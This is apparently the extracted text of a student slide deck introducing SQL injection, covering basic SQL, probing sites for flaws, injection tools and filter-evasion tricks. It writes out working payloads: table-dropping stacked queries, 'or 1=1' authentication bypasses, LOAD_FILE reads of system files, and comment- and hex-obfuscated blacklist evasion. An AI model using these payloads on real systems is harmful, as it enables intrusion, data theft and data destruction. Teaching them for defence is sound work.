SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister
2 SQL Injections SQL injection –code injection technique that exploits a security vulnerability in application – occurs at the database layer of an application. SQL - Structured Query Language –Used to communicate with the database –ANSI-compliant SQL
3 SQL Injections Authentication Bypass Information Disclosure Compromised Data Integrity Compromised Availability of Data Remote Command Execution
4 Basic SQL Select Insert Update Delete Union SQL statement breakdown
5 SQL - Select 1.Select Information from a table SELECT * FROM table where field=1
6 SQL - Insert 1.Add new records to database INSERT INTO tablename (id, name) values(10, “Greg”)
7 SQL - Update 1.Updating existing records UPDATE table set fieldA=123 WHERE somefield=2323 UPDATE table set fieldB=‘Greg’
8 SQL - Delete 1.Delete records DELETE FROM tableA where somefield=1221 DELETE FROM tableA
9 SQL - Union 1.Combine two or more SELECT statements. SELECT column_name(s) FROM table_name1 UNION SELECT column_name(s) FROM table_name2
10 Terminators ; Semi colon ends current SQL query and starts a new one –SELECT * FROM users ; DROP TABLE users Stacked Query -- Double dash ignores remaining query string –Select * FROM users -- limit 10 Can be used in conjunction –SELECT * FROM users WHERE id=''; DROP TABLE users; -- ' AND password=''
11 Where Clause Pruning Powerful SQL technique –SQL trick for allowing a query to return either a full set or a specified subset – 1=1 == TRUE SELECT * FROM users WHERE (id = :id) OR (-1 = :id))
12 SQL Injection Cause Executed via front end of the Web Application –GET URL parameter –Form POST fields
13 Techniques Normal SQL Injections –Errors & Exception –Unexpected output O'Reilly != O\'Reilly Blind SQL Injections –No errors –A lot of guesswork –Introduction of a delay as part of a malicious SQL statement
14 SQL Injection Types Passive –Exposing database information Information retrieval Active –Altering database information Insertion Deletion
15 Testing for Vulnerability Manual –Time consuming Automated –SQL injection scanners only scan for known vulnerabilities Google –Incorrect syntax near
16 Toolbox SQLIer SQLbftools SQLibf SQLBrute BobCat SQLMap Absinthe SQL Injection Pen-testing Tool SQID SQLNinja FJ-Injector Framwork Automagic SQL Injector NGSS SQL Injector
17 Identifying Vulnerable Site Given unexpected input site behaves oddly – ‘ Single Quote – “ Double Quote – ‘1 Single Quote one – ‘a Single Quote a – ‘; Single Quote semicolon Input > Satan’s little minion –Nothing found for Satan\’s little minion –You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'
18 Identifying Vulnerable Site ' or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a
19 Bypassing Filters Escaping entities –%26%23039 == ' == ‘ (single quote) %26 == & %23 == # 039 Entity number –Select * FROM users WHERE username=‘secret%26%23039 OR %26%23039X%26%23039=%26%23039X –Evaluated as > Select * FROM users WHERE username=‘secret ‘ OR ‘X’ = ‘X’ This evaluates to always true Char function –Char(83,101,108,101,99,116,32,42,32,102,114,111,109,32,117,115,101,114,115 ) –Select * from users Concat & Hex functions –CONCAT('0x', HEX('/var/log/messages')) –0x2F F6C6F672F6D
20 Bypassing Filters Injecting AND 1=(SELECT LOAD_FILE('var/log/messages') ) –MySQL Error '\'var/log/messages\') ) limit 5 = 1 order by average desc limit 10' at line 1)
21 Bypassing Filters 1=(SELECT LOAD_FILE('var/log/messages') ) –MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'var/log/messages\') ) limit 5 -- = 1 order by average desc limit 10' at line 1) Char Hex –1=(SELECT LOAD_FILE(0x2F F6C6F672F6D )
22 Bypassing Blacklists What are Blacklists Blacklist (DELETE, EXEC) –DEL/**/ETE –/**/ D/**EVIL**/ELE/**/TE
23 Escape Characters %26%23039 OR %26%23039X%26%23039=%26%23039X –‘ OR ‘X’ = ‘X’